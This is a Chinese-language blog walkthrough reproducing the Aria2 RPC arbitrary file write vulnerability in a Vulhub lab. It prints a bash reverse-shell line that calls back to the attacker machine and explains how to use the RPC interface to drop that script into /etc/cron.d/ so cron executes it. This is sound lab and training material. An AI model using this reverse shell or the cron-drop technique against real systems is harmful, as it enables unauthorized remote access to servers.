vulhub漏洞复现三_aria2

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量441 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122302342
版权

Aria2 任意文件写入漏洞

前言

Aria2是一个命令行下轻量级、多协议、多来源的下载工具

靶场:192.168.4.10_ubuntu

Vps:192.168.4.29_kali

漏洞详细

Aria2(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。

漏洞复现

1. 环境搭建

#docker-compose up -d

6800是aria2的rpc服务的默认端口,环境启动后,访问`http://your-ip:6800/`,发现服务已启动并且返回404页面。

2. Vps开一个服务器存放shell

Shell内容

#! /bin/bash

/bin/bash -i >& /dev/tcp/192.168.4.29/8899 0>&1

3. 漏洞利用

因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/ 。

打开yaaw,点击配置按钮,填入运行aria2的目标域名:`http://your-ip:6800/jsonrpc`:

然后点击Add,增加一个新的下载任务。在Dir的位置填写下载至的目录,File Name处填写文件名。比如,我们通过写入一个crond任务来反弹shell:

这时候,arai2会将恶意文件(我指定的URL)下载到/etc/cron.d/目录下,文件名为shell。而在debian中,/etc/cron.d目录下的所有文件将被作为计划任务配置文件(类似crontab)读取,等待一分钟不到即成功反弹shell(/狗头,等了几分钟,以为没传到,传了几遍没反应,直接进入容器手动触发)

成功反弹

Revenge_scan
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Aria2
xiwangyizhicunzai的博客
11-01 7125
Aria2 任意文件写入漏洞 简介: Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),Aria2 支持许多 curl 和 wget 不支持的协议,例如:BT、磁力链接等等,内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个...
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 998
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
08 - vulhub - Aria2 任意文件写入漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-18 749
Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建`XML-RPC`和`JSON-RPC`接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
小司机的奥拓
04-23 1620
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
vulhub漏洞复现1
xhscxj的博客
05-23 1923
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
(二)vulhub专栏:Shiro漏洞复现汇总
云舒的博客
06-03 1883
Shiro漏洞复现汇总
my_aria2_bot
03-15
Cloudreve-Heroku与Redis Redre的Docker版本的Cloudreve 查看mysql(实验)版: : 关于(目前) 使用redis:6.0.5-alpine重新制作,或重新开启Redis缓存服务 容器中的Redis版本为6.0.5 容器中的Cloudreve版本为...
aria-c_aria_
09-28
2. aria-疙技辑.pdf:这可能是一个拼写错误的文件名,正确的可能是 "aria-技术规格.pdf" 或类似,通常这类文件会包含算法的详细规格、设计原则、操作模式和安全性分析等内容。 3. aria-testvector.pdf:这应该是包含...
aria-java_KISA_aria_
10-04
ARIA是一种高级加密标准(Advanced Encryption Standard),由韩国互联网与安全局(KISA)于2000年提出,作为对AES的一种竞争性加密算法。它设计的目标是提供与AES相当的安全性和效率,并且适用于各种硬件平台,包括...
my_aria2
02-11
Cloudreve-Heroku与RedisRedis的Docker版本的Cloudreve一键部署在Heroku上:查看mysql(实验)版: : 关于(目前)使用redis:6.0.5-alpine重新制作,交替开启Redis缓存服务容器中的Redis版本为6.0.5容器中的...
attachments.zip_Attachments_aria_mobile robots_robots matlab
07-13
Programming Mobile Robots with Aria and Player
download_with_aria2-firefox:适用于Firefox的Aria2下载管理器
02-05
1 Default -Aria2下载文件夹 2 Browser -浏览器下载文件夹(仅用于捕获,非捕获下载将回落到1) 3 Custom -自定义文件夹(如果自定义文件夹的值为"" ,则退回到1) 从历史记录中删除文件之前,请先取消下载,以...
aria2_1.32.0_win_64
07-17
标题"Aria2_1.32.0_win_64"指出这是一个针对Windows 64位系统的Aria2版本,版本号为1.32.0。Aria2是一款多协议、多来源的命令行下载工具,它支持HTTP(S)、FTP、SFTP、BitTorrent等多种协议,能够有效地进行大文件...
Aria2_2018 MAC
06-20
标题"Aria2_2018 MAC"指向的是一个针对苹果MAC操作系统的Aria2工具的2018年版本。Aria2是一款轻量级、多协议且支持多源下载的开源下载管理器,它允许用户以更快的速度下载文件,尤其在配合使用百度网盘时,能够突破...
Aria2 for Chrome-2.1.4.zip
12-27
名称:Aria2 for Chrome ---------------------------------------- 版本:2.1.4 作者:Alex Hua 分类:实用工具 ---------------------------------------- 概述:让Aria2无缝接管下载,加速下载体验,内建Aria2...
aria2_ban_thunder:Aria2 自动 ban 掉迅雷等吸血客户端的脚本
05-03
aria2_ban_thunderAria2 自动 ban 掉迅雷的脚本(仅限 Linux)原理通过 Aria2 rpc (就是API)自动查找迅雷的 peer 然后使用 iptables + ipset 来 ban (所以 windows 不修改是没法用的)这是不修改 Aria2 源码...
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1488
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
aria2 openwrt
最新发布
04-29
Aria2是一个轻量级、多协议、多源下载工具,它支持HTTP、FTP、BitTorrent等多种下载协议,并且可以同时从多个源下载同一个文件,提高下载速度。OpenWrt是一个基于Linux的嵌入式操作系统,主要用于路由器和其他嵌入式设备。下面是关于Aria2在OpenWrt上的介绍: 1. 安装Aria2:在OpenWrt上安装Aria2非常简单,可以通过命令行或者Web界面进行安装。可以使用opkg包管理器来安装Aria2,命令如下: ``` opkg update opkg install aria2 ``` 2. 配置Aria2:安装完成后,需要进行一些配置才能开始使用Aria2。配置文件位于`/etc/aria2.conf`,可以使用文本编辑器进行编辑。你可以设置下载目录、最大下载速度、最大同时下载数等参数。 3. 启动Aria2:配置完成后,可以通过命令行启动Aria2,命令如下: ``` aria2c -c /etc/aria2.conf ``` 4. 使用Aria2:启动后,你可以通过命令行或者Web界面来管理和控制Aria2。通过命令行可以添加下载任务、暂停/恢复下载、查看下载进度等。通过Web界面可以更方便地进行管理和监控。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值